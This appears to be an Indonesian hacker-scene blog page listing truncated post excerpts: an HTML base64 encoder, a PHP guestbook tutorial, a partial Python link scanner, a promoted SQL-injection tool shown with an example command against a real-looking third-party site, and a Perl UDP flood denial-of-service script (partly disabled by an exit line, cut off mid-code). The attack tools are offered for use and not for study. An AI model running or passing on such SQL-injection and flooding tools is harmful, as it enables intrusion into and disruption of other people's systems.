Sekilas Blogs Owner
Gw Hanyalah Seorang Newbie Yang Suram dan seorang yang sangat kesepian tanpa pujaan hati, Tapi Lumayan Ganteng. Hard To Your Self and This Life Must Be Soft To You..
more...

thx to kk byz999 from jatimcrew to share this code…
nice code , brother…
<!DOCTYPE html PUBLIC “-//W3C//DTD HTML 4.01 Transitional//EN”>
<html>
<head>
<title>Jatimcrew Base64 and URL Encoding and Decoding</title>
<meta name=”description” content=”Encodes or decodes data in Base64 or URL encoding using client side JavaScript”>
<meta name=”keywords” content=”base64, base 64, jatimcrew, jatim, crew, urlencode, urldecode, hexencode, hex encode, hexdecode hex decode, javascript [...]

satu lagi tools terbaik dari darkcode …. kek nah di modifikasi oleh devilzc0de crew… keren sob di coba yak …
download dulu source codenya di sini
klik di sini untuk download
cara kerjanya simple
contoh :
cod.py -sqli http://www.an.tv/s/?sid=5&programid=1521
ingat cod.py harus berada pada directory os yang tepat …
hasilnya dapat anda lihat di file flashjumperlog.txt yang akan tercipta dengan sendirinya jika [...]

scanlink.py

scanlink.py adalah software yang jalan di python …
ini sourcenya
import httplib,re,sys,optparse
def make_request(host,page):
try :
connection = httplib.HTTPConnection(host)
connection.request(“GET”,page)
r1 = connection.
VN:F [1.6.9_936]please wait…Rating: 0.0/10 (0 votes cast)VN:F [1.6.9_936]Rating: 0 (from 0 votes)

udp flood.

#!/usr/bin/perl
#####################################################
# udp flood.
#
# gr33ts: meth, etech, skrilla, datawar, fr3aky, etc.
#
# –/odix
#####################################################
# pseudo-crippled by packetstorm to stop script kiddies.
exit(0);
#
use Socket;
$ARGC=@ARGV;
if ($ARGC !=3) {
printf “$0 <ip> <port> <time>\n”;
printf “if arg1/2 =0, randports/continous packets.\n”;
exit(1);
}
my ($ip,$port,$size,$time);
$ip=$ARGV[0];
$port=$ARGV[1];
$time=$ARGV[2];
socket(crazy, PF_INET, SOCK_DGRAM, 17);
$iaddr = inet_aton(“$ip”);
printf “udp flood – odix\n”;
if ($ARGV[1] ==0 && $ARGV[2] ==0) {
goto randpackets;
}
if ($ARGV[1] !=0 && $ARGV[2] !=0) {
system(“(sleep $time;killall [...]

buku tamu ( php ) with data base …

//

1. Bagian untuk peringatan jika ada inputan yang belum disisi, sebagai contoh di atas, pengunjung belum mengisi email tetapi memaksakan menekan tombol kirim, maka munculah peringatan seperti gambar diatas.
2. Formulir buku tamu, tempat untuk mengisi data yang di perlukan
3. Bagian Data, untuk menampilkan data buku tamu pengunjung web. Perhatikan baik-baik letak pengirim, posisi komentar [...]